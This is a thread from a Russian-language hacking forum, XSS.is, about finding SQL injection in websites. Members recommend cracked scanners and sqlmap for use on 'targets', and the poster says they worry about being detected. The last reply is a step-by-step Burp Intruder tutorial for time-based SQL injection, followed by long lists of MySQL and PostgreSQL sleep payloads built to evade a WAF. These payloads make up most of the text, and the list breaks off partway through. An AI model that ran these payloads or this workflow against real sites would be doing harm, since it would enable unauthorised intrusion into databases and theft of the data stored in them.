• XSS.stack #1 – первый литературный журнал от юзеров форума

SQL Injection-Поиск

Отслеживать
Limbo001

Limbo001

RAID-массив
Пользователь
Регистрация
02.02.2022
Сообщения
66
Реакции
45
Всем привет. Подскажите пж по раскрутке sql injection.

Читал про несколько типов sql Injection: error based , union , blind , boolean blind.

Выделил для себя ряд брут команд по каждому типу, создал немалое количество словарей. Использую фаззинг директорий. А потом по каждому урлу прохожусь. В основном с mysql работаю.

Достаточно долго ищу руками ( стараюсь поменьше использовать масскан в сканерах, в основном через burp intruder), стараюсь найти линк связанный с id ( категории, товары, вообщем наименования связанные с бд):
Код: 
?id=1 or 1=1
or 1=1--
'having 1=1--
'OR'text' = N'text'
и тому подобное

Основная сложность пока заключается не в раскрутке, а определении sql injection ( масскан стремновато и палевно проводить)

Реально ли по такой стратегии найти что-либо? Или на какие директории, разделы сайта обращать внимание? Без масскана( acunetix, netsparker и т.п.) можно обойтись?
 
Limbo001 сказал(а):
Всем привет. Подскажите пж по раскрутке sql injection.

Читал про несколько типов sql Injection: error based , union , blind , boolean blind.

Выделил для себя ряд брут команд по каждому типу, создал немалое количество словарей. Использую фаззинг директорий. А потом по каждому урлу прохожусь. В основном с mysql работаю.

Достаточно долго ищу руками ( стараюсь поменьше использовать масскан в сканерах, в основном через burp intruder), стараюсь найти линк связанный с id ( категории, товары, вообщем наименования связанные с бд):
Код: 
?id=1 or 1=1
or 1=1--
'having 1=1--
'OR'text' = N'text'
и тому подобное

Основная сложность пока заключается не в раскрутке, а определении sql injection ( масскан стремновато и палевно проводить)

Реально ли по такой стратегии найти что-либо? Или на какие директории, разделы сайта обращать внимание? Без масскана( acunetix, netsparker и т.п.) можно обойтись?
Ну инструменты можно выбрать другие, тут например популярен окунь на форуме, кряк тоже тут есть.
 
Но я тоже предпочитаю искать руками, подумай!!! где сайт обращается к бд, чтобы что-то сделать, форма входа например.....она проверяет есть ли такой логин, пароль в БД и если есть то даёт доступ....если закрыть запрос, то можно вывести....ну ты знаешь говоришь..такие места обычно ещё это поиск, блок с выводом записей и так далее, даже коментарий тот же от куда то берётся, значит где то хранится. незря же SQL инъекция, ты должен внедрить свой SQL код, сделать это можно только там, где веб-приложение общается по средствам SQL
 
BLUA сказал(а):
Ну инструменты можно выбрать другие, тут например популярен окунь на форуме, кряк тоже тут есть.
BLUA сказал(а):
Но я тоже предпочитаю искать руками, подумай!!! где сайт обращается к бд, чтобы что-то сделать, форма входа например.....она проверяет есть ли такой логин, пароль в БД и если есть то даёт доступ....если закрыть запрос, то можно вывести....ну ты знаешь говоришь..такие места обычно ещё это поиск, блок с выводом записей и так далее, даже коментарий тот же от куда то берётся, значит где то хранится. незря же SQL инъекция, ты должен внедрить свой SQL код, сделать это можно только там, где веб-приложение общается по средствам SQL
Да, стараюсь поменьше массканить( через burp + расширения). Разумеется сначала через авторизационную форму ищу скулю, а далее в http подставляю словари))) Пока что кручю верчу в php + mysql ) Мне пока ближе данные технологии, классика веба считай)) Путаница иногда возникает именно в обнаружении нужной http директории ( ищу через index.php?id=1 {payload}, если вижу url по типу url/category/5(6,7... ) ) . В основном все курсы и статьи, которые видел в примерах рассматривали через колонку id и php , уверен есть в других местах, малопопулярных. Спс за советы)
 
А каким боком masscan относится к sql inj? Уж тогда sqlmap раз на то пошло.
А руками искать можно часами, если это не error based.
 
Limbo001 сказал(а):
Да, стараюсь поменьше массканить( через burp + расширения). Разумеется сначала через авторизационную форму ищу скулю, а далее в http подставляю словари))) Пока что кручю верчу в php + mysql ) Мне пока ближе данные технологии, классика веба считай)) Путаница иногда возникает именно в обнаружении нужной http директории ( ищу через index.php?id=1 {payload}, если вижу url по типу url/category/5(6,7... ) ) . В основном все курсы и статьи, которые видел в примерах рассматривали через колонку id и php , уверен есть в других местах, малопопулярных. Спс за советы)
Какой нах,
index.php?id=1 {payload}
ты сначала разберись с обрамлением в БД, а потом уже исходя из того как записи выглядят в БД , засовывай туда пайлоад
 
kiloton сказал(а):
А каким боком masscan относится к sql inj? Уж тогда sqlmap раз на то пошло.
А руками искать можно часами, если это не error based.
masscan для обнаружения ) Через sqlmap уже автоматизация и раскрутка идет же)
 
фаззинг он больше для того чтобы понять какие диры есть на сайте, помогает при поиски админки например. или файлов каких, которых нет на сайте.
масскан пробивает какие порты открыты на таргете...
это вообще не из той пьессы, возьми окуня, поставь его и проскань таргеты, пока не найдёшь репорт с SQLinj, как увидишь, попробуй крутануть в sqlmap.
не получится , приходи сюда
 
BLUA сказал(а):
Какой нах,

ты сначала разберись с обрамлением в БД, а потом уже исходя из того как записи выглядят в БД , засовывай туда пайлоад
Во всех примерах практически такой синтакис: /?id=1 далее что ниже
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*

В этом то у меня и затык, знаю что есть другие директории, техники, но пока от просто к сложному стараюсь идти
 
BLUA сказал(а):
вопрос только в том, обнаружения чего ?
обнаружения различных уязвимостей) Мне пока вылетало чаще всего xss )) Sql Inj очень редко))) LCE,RCE только в песочницах и тренировочных средах встречал. Почитав форум пришел к выводу, что руки + мозг сначала, а далее только автоматизация!!
 
Последнее редактирование:
Limbo001 сказал(а):
Во всех примерах практически такой синтакис: /?id=1 далее что ниже
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*

В этом то у меня и затык, знаю что есть другие директории, техники, но пока от просто к сложному стараюсь идти
Вот и прокололся, что про SQLinj ты ни чего не понял.
Сначала нужно искать как данные записываются в базу.....для примера так 'login' или так "login"
короче иди читай мат часть, не занаешь что такое sqli ни понял что такое полезная нагрузка.....и не понял где вообще эти sqli есть!
Иди учи мат часть!
 
BLUA сказал(а):
Вот и прокололся, что про SQLinj ты ни чего не понял.
Сначала нужно искать как данные записываются в базу.....для примера так 'login' или так "login"
короче иди читай мат часть, не занаешь что такое sqli ни понял что такое полезная нагрузка.....и не понял где вообще эти sqli есть!
Иди учи мат часть!
Читал CEH + codeby+hackthebox+hacktrics . Что посоветуешь пж?
 
BLUA сказал(а):
Вот и прокололся, что про SQLinj ты ни чего не понял.
Сначала нужно искать как данные записываются в базу.....для примера так 'login' или так "login"
короче иди читай мат часть, не занаешь что такое sqli ни понял что такое полезная нагрузка.....и не понял где вообще эти sqli есть!
Иди учи мат часть!
Про запис данных, проходил это: зависит от синтаксиса прогера:
Код: 
select * from table_name where id=1
select * from table_name where id='1'
select * from table_name where id="1"
select * from table_name where id=(1)
select * from table_name where id=('1')
select * from table_name where id=("1")

До меня дойдет только тогда, когда в реалиях сделаю, практик по натуре больше ( когда изучаю теорию и задачки засыпаю, стараюсь заставлять себя концентрироваться). Но вдохновение приходит тогда, когда в реальное поле выходишь, а не заранее нарисованную и банальную среду
 
Limbo001 сказал(а):
До меня дойдет только тогда, когда в реалиях сделаю

А что мешает установить любое дырявое веб приложение/плагин где есть паблик CVE, включить логи в базе и поковырять как всё работает, вместо того чтобы путать здесь 3 разных термина не особо связанных между собой?
 
Limbo001 сказал(а):
Про запис данных, проходил это: зависит от синтаксиса прогера:
Код: 
select * from table_name where id=1
select * from table_name where id='1'
select * from table_name where id="1"
select * from table_name where id=(1)
select * from table_name where id=('1')
select * from table_name where id=("1")

До меня дойдет только тогда, когда в реалиях сделаю, практик по натуре больше ( когда изучаю теорию и задачки засыпаю, стараюсь заставлять себя концентрироваться). Но вдохновение приходит тогда, когда в реальное поле выходишь, а не заранее нарисованную и банальную среду
Тяжело тебе тогда придётся. Я тебе уже сказал как сделать надо. Взять окуня, найти им SQLinj и он тебе покажет там что и как красивым репортом, вот там и разбирайся, увидишь какую он нагрузку использовал, куда её вставил, какой у этого параметра оригинальный параметр и сможешь воспроязвести уязвимость руками
 
kiloton сказал(а):
А что мешает установить любое дырявое веб приложение/плагин где есть паблик CVE, включить логи в базе и поковырять как всё работает, вместо того чтобы путать здесь 3 разных термина не особо связанных между собой?
Ничего не мешает) Про masscan понял, спутал чутка) Иммел ввиду в контексте про массовое сканирование url сайта на поиск cve, а не открытые/закрытые порты( nmap в комплексе тоже применяю)
 
BLUA сказал(а):
Тяжело тебе тогда придётся. Я тебе уже сказал как сделать надо. Взять окуня, найти им SQLinj и он тебе покажет там что и как красивым репортом, вот там и разбирайся, увидишь какую он нагрузку использовал, куда её вставил, какой у этого параметра оригинальный параметр и сможешь воспроязвести уязвимость руками
Спасибо за совет! Сделаю!
 
Limbo001 сказал(а):
Реально ли по такой стратегии найти что-либо?
Более чем. Полуавтоматическим методом, через интрудер. Рекомендую юзать еще пэйлоады под Time-Based, причем в разных вариациях (на тот случай если на таргете есть WAF).

1.png

  • Загружаешь пейлоады под MySQL Time-Based
  • В Payload Processing заменяешь значение 24 на значение своего параметра
3.png

  • Например если тебе надо протестировать линк (параметр) http://site.com/news?id=123 - вместо 24 подставляешь 123
  • Далее на вкладке Resource Pool рекомендую сделать не быструю скорость чека каждого пейлоада. Например так:
4.png

  • Далее на вкладке Positions помечаешь значение своего параметра знаками параграфа таким образом:
2.png

  • Ну и хуярим по оранжевой кнопке Start attack, после чего наблюдаем такую картину:
5.png

  • Атака на параметр пошла. На вкладке Columns нужно поставить галочку напротив пункта Response received - для того что-бы отображалось количество миллисекунд за которое таргет отвечает на каждый пейлоад.
  • В случае если параметр уязвим к Time-Based SQLi, ты это поймешь по времени ответа таргета, оно будет в виде пятизначного числа. Напротив пейлоада увидишь например 58372. Ну и далее как обычно, либо в SQLMap запихивать, либо руками пробовать ковырять UNION например, ведь там где Time-Based - может быть и UNION, и Boolean и прочие радости.
  • Поупражняйся с этим делом например на testphp.vulnweb.com.
  • Далее небольшие списки пейлоадов в помощь:
MySQL:
Код: 
sLeEp(10)
SlEEp(10)--
sleeP(10)#
(select(0)from(select(sleep(10)))v)/*'+(select(0)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"*/
(select*from(select(sleep(10)))a)
'+(select*from(select(sleep(20)))a)+'
{base}'+(select*from(select(sleep(10)))a)+'
{base}"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z
{base}'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
{base} ANd sLEep(10)
{base}/**/aND/**/sLeEp(10)
{base}%0AanD%09SlEEp(10)
{base} ANd sLEep(10)-- kFQt
{base}/**/aND/**/sLeEp(10)--/**/wVbr
{base}%0CanD%09SlEEp(10)--%0AuVJn
{base} ANd sLEep(10)# kFQt
{base}/**/aND/**/sLeEp(10)#/**/wVbr
{base}%0CanD%09SlEEp(10)#%0AuVJn
{base} oR sLEep(10)
{base}/**/Or/**/sLeEp(10)
{base}%0AoR%09SlEEp(10)
{base} Or sLEep(10)-- kFQt
{base}/**/oR/**/sLeEp(10)--/**/wVbr
{base}%0COr%09SlEEp(10)--%0AuVJn
{base} Or sLEep(10)# kFQt
{base}/**/oR/**/sLeEp(10)#/**/wVbr
{base}%0COr%09SlEEp(10)#%0AuVJn
{base}' ANd sLEep(10)
{base}'/**/aND/**/sLeEp(10)
{base}'%0AanD%09SlEEp(10)
{base}' ANd sLEep(10)-- kFQt
{base}'/**/aND/**/sLeEp(10)--/**/wVbr
{base}'%0CanD%09SlEEp(10)--%0AuVJn
{base}' ANd sLEep(10)# kFQt
{base}'/**/aND/**/sLeEp(10)#/**/wVbr
{base}'%0CanD%09SlEEp(10)#%0AuVJn
{base}' oR sLEep(10)
{base}'/**/Or/**/sLeEp(10)
{base}'%0AoR%09SlEEp(10)
{base}' Or sLEep(10)-- kFQt
{base}'/**/oR/**/sLeEp(10)--/**/wVbr
{base}'%0COr%09SlEEp(10)--%0AuVJn
{base}' Or sLEep(10)# kFQt
{base}'/**/oR/**/sLeEp(10)#/**/wVbr
{base}'%0COr%09SlEEp(10)#%0AuVJn
{base}" ANd sLEep(10)
{base}"/**/aND/**/sLeEp(10)
{base}"%0AanD%09SlEEp(10)
{base}" ANd sLEep(10)-- kFQt
{base}"/**/aND/**/sLeEp(10)--/**/wVbr
{base}"%0CanD%09SlEEp(10)--%0AuVJn
{base}" ANd sLEep(10)# kFQt
{base}"/**/aND/**/sLeEp(10)#/**/wVbr
{base}"%0CanD%09SlEEp(10)#%0AuVJn
{base}" oR sLEep(10)
{base}"/**/Or/**/sLeEp(10)
{base}"%0AoR%09SlEEp(10)
{base}" Or sLEep(10)-- kFQt
{base}"/**/oR/**/sLeEp(10)--/**/wVbr
{base}"%0COr%09SlEEp(10)--%0AuVJn
{base}" Or sLEep(10)# kFQt
{base}"/**/oR/**/sLeEp(10)#/**/wVbr
{base}"%0COr%09SlEEp(10)#%0AuVJn
{base}+ ANd sLEep(10)
{base}+/**/aND/**/sLeEp(10)
{base}+%0AanD%09SlEEp(10)
{base}+ ANd sLEep(10)-- kFQt
{base}+/**/aND/**/sLeEp(10)--/**/wVbr
{base}+%0CanD%09SlEEp(10)--%0AuVJn
{base}+ ANd sLEep(10)# kFQt
{base}+/**/aND/**/sLeEp(10)#/**/wVbr
{base}+%0CanD%09SlEEp(10)#%0AuVJn
{base}+ oR sLEep(10)
{base}+/**/Or/**/sLeEp(10)
{base}+%0AoR%09SlEEp(10)
{base}+ Or sLEep(10)-- kFQt
{base}+/**/oR/**/sLeEp(10)--/**/wVbr
{base}+%0COr%09SlEEp(10)--%0AuVJn
{base}+ Or sLEep(10)# kFQt
{base}+/**/oR/**/sLeEp(10)#/**/wVbr
{base}+%0COr%09SlEEp(10)#%0AuVJn
{base}') ANd sLEep(10)
{base}')/**/aND/**/sLeEp(10)
{base}')%0AanD%09SlEEp(10)
{base}') ANd sLEep(10)-- kFQt
{base}')/**/aND/**/sLeEp(10)--/**/wVbr
{base}')%0CanD%09SlEEp(10)--%0AuVJn
{base}') ANd sLEep(10)# kFQt
{base}')/**/aND/**/sLeEp(10)#/**/wVbr
{base}')%0CanD%09SlEEp(10)#%0AuVJn
{base}') oR sLEep(10)
{base}')/**/Or/**/sLeEp(10)
{base}')%0AoR%09SlEEp(10)
{base}') Or sLEep(10)-- kFQt
{base}')/**/oR/**/sLeEp(10)--/**/wVbr
{base}')%0COr%09SlEEp(10)--%0AuVJn
{base}') Or sLEep(10)# kFQt
{base}')/**/oR/**/sLeEp(10)#/**/wVbr
{base}')%0COr%09SlEEp(10)#%0AuVJn
{base}')) ANd sLEep(10)
{base}'))/**/aND/**/sLeEp(10)
{base}'))%0AanD%09SlEEp(10)
{base}')) ANd sLEep(10)-- kFQt
{base}'))/**/aND/**/sLeEp(10)--/**/wVbr
{base}'))%0CanD%09SlEEp(10)--%0AuVJn
{base}')) ANd sLEep(10)# kFQt
{base}'))/**/aND/**/sLeEp(10)#/**/wVbr
{base}'))%0CanD%09SlEEp(10)#%0AuVJn
{base}')) oR sLEep(10)
{base}'))/**/Or/**/sLeEp(10)
{base}'))%0AoR%09SlEEp(10)
{base}')) Or sLEep(10)-- kFQt
{base}'))/**/oR/**/sLeEp(10)--/**/wVbr
{base}'))%0COr%09SlEEp(10)--%0AuVJn
{base}')) Or sLEep(10)# kFQt
{base}'))/**/oR/**/sLeEp(10)#/**/wVbr
{base}'))%0COr%09SlEEp(10)#%0AuVJn
{base}'))) ANd sLEep(10)
{base}')))/**/aND/**/sLeEp(10)
{base}')))%0AanD%09SlEEp(10)
{base}'))) ANd sLEep(10)-- kFQt
{base}')))/**/aND/**/sLeEp(10)--/**/wVbr
{base}')))%0CanD%09SlEEp(10)--%0AuVJn
{base}'))) ANd sLEep(10)# kFQt
{base}')))/**/aND/**/sLeEp(10)#/**/wVbr
{base}')))%0CanD%09SlEEp(10)#%0AuVJn
{base}'))) oR sLEep(10)
{base}')))/**/Or/**/sLeEp(10)
{base}')))%0AoR%09SlEEp(10)
{base}'))) Or sLEep(10)-- kFQt
{base}')))/**/oR/**/sLeEp(10)--/**/wVbr
{base}')))%0COr%09SlEEp(10)--%0AuVJn
{base}'))) Or sLEep(10)# kFQt
{base}')))/**/oR/**/sLeEp(10)#/**/wVbr
{base}')))%0COr%09SlEEp(10)#%0AuVJn
{base}") ANd sLEep(10)
{base}")/**/aND/**/sLeEp(10)
{base}")%0AanD%09SlEEp(10)
{base}") ANd sLEep(10)-- kFQt
{base}")/**/aND/**/sLeEp(10)--/**/wVbr
{base}")%0CanD%09SlEEp(10)--%0AuVJn
{base}") ANd sLEep(10)# kFQt
{base}")/**/aND/**/sLeEp(10)#/**/wVbr
{base}")%0CanD%09SlEEp(10)#%0AuVJn
{base}") oR sLEep(10)
{base}")/**/Or/**/sLeEp(10)
{base}")%0AoR%09SlEEp(10)
{base}") Or sLEep(10)-- kFQt
{base}")/**/oR/**/sLeEp(10)--/**/wVbr
{base}")%0COr%09SlEEp(10)--%0AuVJn
{base}") Or sLEep(10)# kFQt
{base}")/**/oR/**/sLeEp(10)#/**/wVbr
{base}")%0COr%09SlEEp(10)#%0AuVJn
{base}")) ANd sLEep(10)
{base}"))/**/aND/**/sLeEp(10)
{base}"))%0AanD%09SlEEp(10)
{base}")) ANd sLEep(10)-- kFQt
{base}"))/**/aND/**/sLeEp(10)--/**/wVbr
{base}"))%0CanD%09SlEEp(10)--%0AuVJn
{base}")) ANd sLEep(10)# kFQt
{base}"))/**/aND/**/sLeEp(10)#/**/wVbr
{base}"))%0CanD%09SlEEp(10)#%0AuVJn
{base}")) oR sLEep(10)
{base}"))/**/Or/**/sLeEp(10)
{base}"))%0AoR%09SlEEp(10)
{base}")) Or sLEep(10)-- kFQt
{base}"))/**/oR/**/sLeEp(10)--/**/wVbr
{base}"))%0COr%09SlEEp(10)--%0AuVJn
{base}")) Or sLEep(10)# kFQt
{base}"))/**/oR/**/sLeEp(10)#/**/wVbr
{base}"))%0COr%09SlEEp(10)#%0AuVJn
{base}"))) ANd sLEep(10)
{base}")))/**/aND/**/sLeEp(10)
{base}")))%0AanD%09SlEEp(10)
{base}"))) ANd sLEep(10)-- kFQt
{base}")))/**/aND/**/sLeEp(10)--/**/wVbr
{base}")))%0CanD%09SlEEp(10)--%0AuVJn
{base}"))) ANd sLEep(10)# kFQt
{base}")))/**/aND/**/sLeEp(10)#/**/wVbr
{base}")))%0CanD%09SlEEp(10)#%0AuVJn
{base}"))) oR sLEep(10)
{base}")))/**/Or/**/sLeEp(10)
{base}")))%0AoR%09SlEEp(10)
{base}"))) Or sLEep(10)-- kFQt
{base}")))/**/oR/**/sLeEp(10)--/**/wVbr
{base}")))%0COr%09SlEEp(10)--%0AuVJn
{base}"))) Or sLEep(10)# kFQt
{base}")))/**/oR/**/sLeEp(10)#/**/wVbr
{base}")))%0COr%09SlEEp(10)#%0AuVJn
{base}%' ANd sLEep(10)
{base}%'/**/aND/**/sLeEp(10)
{base}%'%0AanD%09SlEEp(10)
{base}%' ANd sLEep(10)-- kFQt
{base}%'/**/aND/**/sLeEp(10)--/**/wVbr
{base}%'%0CanD%09SlEEp(10)--%0AuVJn
{base}%' ANd sLEep(10)# kFQt
{base}%'/**/aND/**/sLeEp(10)#/**/wVbr
{base}%'%0CanD%09SlEEp(10)#%0AuVJn
{base}%' oR sLEep(10)
{base}%'/**/Or/**/sLeEp(10)
{base}%'%0AoR%09SlEEp(10)
{base}%' Or sLEep(10)-- kFQt
{base}%'/**/oR/**/sLeEp(10)--/**/wVbr
{base}%'%0COr%09SlEEp(10)--%0AuVJn
{base}%' Or sLEep(10)# kFQt
{base}%'/**/oR/**/sLeEp(10)#/**/wVbr
{base}%'%0COr%09SlEEp(10)#%0AuVJn
{base}) ANd sLEep(10)
{base})/**/aND/**/sLeEp(10)
{base})%0AanD%09SlEEp(10)
{base}) ANd sLEep(10)-- kFQt
{base})/**/aND/**/sLeEp(10)--/**/wVbr
{base})%0CanD%09SlEEp(10)--%0AuVJn
{base}) ANd sLEep(10)# kFQt
{base})/**/aND/**/sLeEp(10)#/**/wVbr
{base})%0CanD%09SlEEp(10)#%0AuVJn
{base}) oR sLEep(10)
{base})/**/Or/**/sLeEp(10)
{base})%0AoR%09SlEEp(10)
{base}) Or sLEep(10)-- kFQt
{base})/**/oR/**/sLeEp(10)--/**/wVbr
{base})%0COr%09SlEEp(10)--%0AuVJn
{base}) Or sLEep(10)# kFQt
{base})/**/oR/**/sLeEp(10)#/**/wVbr
{base})%0COr%09SlEEp(10)#%0AuVJn
{base})) ANd sLEep(10)
{base}))/**/aND/**/sLeEp(10)
{base}))%0AanD%09SlEEp(10)
{base})) ANd sLEep(10)-- kFQt
{base}))/**/aND/**/sLeEp(10)--/**/wVbr
{base}))%0CanD%09SlEEp(10)--%0AuVJn
{base})) ANd sLEep(10)# kFQt
{base}))/**/aND/**/sLeEp(10)#/**/wVbr
{base}))%0CanD%09SlEEp(10)#%0AuVJn
{base})) oR sLEep(10)
{base}))/**/Or/**/sLeEp(10)
{base}))%0AoR%09SlEEp(10)
{base})) Or sLEep(10)-- kFQt
{base}))/**/oR/**/sLeEp(10)--/**/wVbr
{base}))%0COr%09SlEEp(10)--%0AuVJn
{base})) Or sLEep(10)# kFQt
{base}))/**/oR/**/sLeEp(10)#/**/wVbr
{base}))%0COr%09SlEEp(10)#%0AuVJn
{base}))) ANd sLEep(10)
{base})))/**/aND/**/sLeEp(10)
{base})))%0AanD%09SlEEp(10)
{base}))) ANd sLEep(10)-- kFQt
{base})))/**/aND/**/sLeEp(10)--/**/wVbr
{base})))%0CanD%09SlEEp(10)--%0AuVJn
{base}))) ANd sLEep(10)# kFQt
{base})))/**/aND/**/sLeEp(10)#/**/wVbr
{base})))%0CanD%09SlEEp(10)#%0AuVJn
{base}))) oR sLEep(10)
{base})))/**/Or/**/sLeEp(10)
{base})))%0AoR%09SlEEp(10)
{base}))) Or sLEep(10)-- kFQt
{base})))/**/oR/**/sLeEp(10)--/**/wVbr
{base})))%0COr%09SlEEp(10)--%0AuVJn
{base}))) Or sLEep(10)# kFQt
{base})))/**/oR/**/sLeEp(10)#/**/wVbr
{base})))%0COr%09SlEEp(10)#%0AuVJn
{base}`) ANd sLEep(10)
{base}`)/**/aND/**/sLeEp(10)
{base}`)%0AanD%09SlEEp(10)
{base}`) ANd sLEep(10)-- kFQt
{base}`)/**/aND/**/sLeEp(10)--/**/wVbr
{base}`)%0CanD%09SlEEp(10)--%0AuVJn
{base}`) ANd sLEep(10)# kFQt
{base}`)/**/aND/**/sLeEp(10)#/**/wVbr
{base}`)%0CanD%09SlEEp(10)#%0AuVJn
{base}`) oR sLEep(10)
{base}`)/**/Or/**/sLeEp(10)
{base}`)%0AoR%09SlEEp(10)
{base}`) Or sLEep(10)-- kFQt
{base}`)/**/oR/**/sLeEp(10)--/**/wVbr
{base}`)%0COr%09SlEEp(10)--%0AuVJn
{base}`) Or sLEep(10)# kFQt
{base}`)/**/oR/**/sLeEp(10)#/**/wVbr
{base}`)%0COr%09SlEEp(10)#%0AuVJn
{base}'+ ANd sLEep(10)
{base}'+/**/aND/**/sLeEp(10)
{base}'+%0AanD%09SlEEp(10)
{base}'+ ANd sLEep(10)-- kFQt
{base}'+/**/aND/**/sLeEp(10)--/**/wVbr
{base}'+%0CanD%09SlEEp(10)--%0AuVJn
{base}'+ ANd sLEep(10)# kFQt
{base}'+/**/aND/**/sLeEp(10)#/**/wVbr
{base}'+%0CanD%09SlEEp(10)#%0AuVJn
{base}'+ oR sLEep(10)
{base}'+/**/Or/**/sLeEp(10)
{base}'+%0AoR%09SlEEp(10)
{base}'+ Or sLEep(10)-- kFQt
{base}'+/**/oR/**/sLeEp(10)--/**/wVbr
{base}'+%0COr%09SlEEp(10)--%0AuVJn
{base}'+ Or sLEep(10)# kFQt
{base}'+/**/oR/**/sLeEp(10)#/**/wVbr
{base}'+%0COr%09SlEEp(10)#%0AuVJn

PostgreSQL:
Код: 
pg_sLeEp(10)
pg_sLeEp(10)--
pg_sLeEp(10)#
ANd pg_sLeEp(10)
aND/**/pg_sLeEp(10)
anD%09pg_sLeEp(10)
oR pg_sLeEp(10)
Or/**/pg_sLeEp(10)
oR%09pg_sLeEp(10)
ANd pg_sLeEp(10)-- kFQt
aND/**/pg_sLeEp(10)--/**/wVbr
oR/**/pg_sLeEp(10)#/**/wVbr
Or pg_sLeEp(10)-- kFQt
Or%09pg_sLeEp(10)--%0AuVJn
{base} ANd pg_sLeEp(10)
{base}/**/aND/**/pg_sLeEp(10)
{base}%0AanD%09pg_sLeEp(10)
{base} ANd pg_sLeEp(10)-- kFQt
{base}/**/aND/**/pg_sLeEp(10)--/**/wVbr
{base}%0CanD%09pg_sLeEp(10)--%0AuVJn
{base} ANd pg_sLeEp(10)# kFQt
{base}/**/aND/**/pg_sLeEp(10)#/**/wVbr
{base}%0CanD%09pg_sLeEp(10)#%0AuVJn
{base} oR pg_sLeEp(10)
{base}/**/Or/**/pg_sLeEp(10)
{base}%0AoR%09pg_sLeEp(10)
{base} Or pg_sLeEp(10)-- kFQt
{base}/**/oR/**/pg_sLeEp(10)--/**/wVbr
{base}%0COr%09pg_sLeEp(10)--%0AuVJn
{base} Or pg_sLeEp(10)# kFQt
{base}/**/oR/**/pg_sLeEp(10)#/**/wVbr
{base}%0COr%09pg_sLeEp(10)#%0AuVJn
{base}' ANd pg_sLeEp(10)
{base}'/**/aND/**/pg_sLeEp(10)
{base}'%0AanD%09pg_sLeEp(10)
{base}' ANd pg_sLeEp(10)-- kFQt
{base}'/**/aND/**/pg_sLeEp(10)--/**/wVbr
{base}'%0CanD%09pg_sLeEp(10)--%0AuVJn
{base}' ANd pg_sLeEp(10)# kFQt
{base}'/**/aND/**/pg_sLeEp(10)#/**/wVbr
{base}'%0CanD%09pg_sLeEp(10)#%0AuVJn
{base}' oR pg_sLeEp(10)
{base}'/**/Or/**/pg_sLeEp(10)
{base}'%0AoR%09pg_sLeEp(10)
{base}' Or pg_sLeEp(10)-- kFQt
{base}'/**/oR/**/pg_sLeEp(10)--/**/wVbr
{base}'%0COr%09pg_sLeEp(10)--%0AuVJn
{base}' Or pg_sLeEp(10)# kFQt
{base}'/**/oR/**/pg_sLeEp(10)#/**/wVbr
{base}'%0COr%09pg_sLeEp(10)#%0AuVJn
{base}" ANd pg_sLeEp(10)
{base}"/**/aND/**/pg_sLeEp(10)
{base}"%0AanD%09pg_sLeEp(10)
{base}" ANd pg_sLeEp(10)-- kFQt
{base}"/**/aND/**/pg_sLeEp(10)--/**/wVbr
{base}"%0CanD%09pg_sLeEp(10)--%0AuVJn
{base}" ANd pg_sLeEp(10)# kFQt
{base}"/**/aND/**/pg_sLeEp(10)#/**/wVbr
{base}"%0CanD%09pg_sLeEp(10)#%0AuVJn
{base}" oR pg_sLeEp(10)
{base}"/**/Or/**/pg_sLeEp(10)
{base}"%0AoR%09pg_sLeEp(10)
{base}" Or pg_sLeEp(10)-- kFQt
{base}"/**/oR/**/pg_sLeEp(10)--/**/wVbr
{base}"%0COr%09pg_sLeEp(10)--%0AuVJn
{base}" Or pg_sLeEp(10)# kFQt
{base}"/**/oR/**/pg_sLeEp(10)#/**/wVbr
{base}"%0COr%09pg_sLeEp(10)#%0AuVJn
{base}+ ANd pg_sLeEp(10)
{base}+/**/aND/**/pg_sLeEp(10)
{base}+%0AanD%09pg_sLeEp(10)
{base}+ ANd pg_sLeEp(10)-- kFQt
{base}+/**/aND/**/pg_sLeEp(10)--/**/wVbr
{base}+%0CanD%09pg_sLeEp(10)--%0AuVJn
{base}+ ANd pg_sLeEp(10)# kFQt
{base}+/**/aND/**/pg_sLeEp(10)#/**/wVbr
{base}+%0CanD%09pg_sLeEp(10)#%0AuVJn
{base}+ oR pg_sLeEp(10)
{base}+/**/Or/**/pg_sLeEp(10)
{base}+%0AoR%09pg_sLeEp(10)
{base}+ Or pg_sLeEp(10)-- kFQt
{base}+/**/oR/**/pg_sLeEp(10)--/**/wVbr
{base}+%0COr%09pg_sLeEp(10)--%0AuVJn
{base}+ Or pg_sLeEp(10)# kFQt
{base}+/**/oR/**/pg_sLeEp(10)#/**/wVbr
{base}+%0COr%09pg_sLeEp(10)#%0AuVJn
{base}') ANd pg_sLeEp(10)
{base}')/**/aND/**/pg_sLeEp(10)
{base}')%0AanD%09pg_sLeEp(10)
{base}') ANd pg_sLeEp(10)-- kFQt
{base}')/**/aND/**/pg_sLeEp(10)--/**/wVbr
{base}')%0CanD%09pg_sLeEp(10)--%0AuVJn
{base}') ANd pg_sLeEp(10)# kFQt
{base}')/**/aND/**/pg_sLeEp(10)#/**/wVbr
{base}')%0CanD%09pg_sLeEp(10)#%0AuVJn
{base}') oR pg_sLeEp(10)
{base}')/**/Or/**/pg_sLeEp(10)
{base}')%0AoR%09pg_sLeEp(10)
{base}') Or pg_sLeEp(10)-- kFQt
{base}')/**/oR/**/pg_sLeEp(10)--/**/wVbr
{base}')%0COr%09pg_sLeEp(10)--%0AuVJn
{base}') Or pg_sLeEp(10)# kFQt
{base}')/**/oR/**/pg_sLeEp(10)#/**/wVbr
{base}')%0COr%09pg_sLeEp(10)#%0AuVJn
{base}')) ANd pg_sLeEp(10)
{base}'))/**/aND/**/pg_sLeEp(10)
{base}'))%0AanD%09pg_sLeEp(10)
{base}')) ANd pg_sLeEp(10)-- kFQt
{base}'))/**/aND/**/pg_sLeEp(10)--/**/wVbr
{base}'))%0CanD%09pg_sLeEp(10)--%0AuVJn
{base}')) ANd pg_sLeEp(10)# kFQt
{base}'))/**/aND/**/pg_sLeEp(10)#/**/wVbr
{base}'))%0CanD%09pg_sLeEp(10)#%0AuVJn
{base}')) oR pg_sLeEp(10)
{base}'))/**/Or/**/pg_sLeEp(10)
{base}'))%0AoR%09pg_sLeEp(10)
{base}')) Or pg_sLeEp(10)-- kFQt
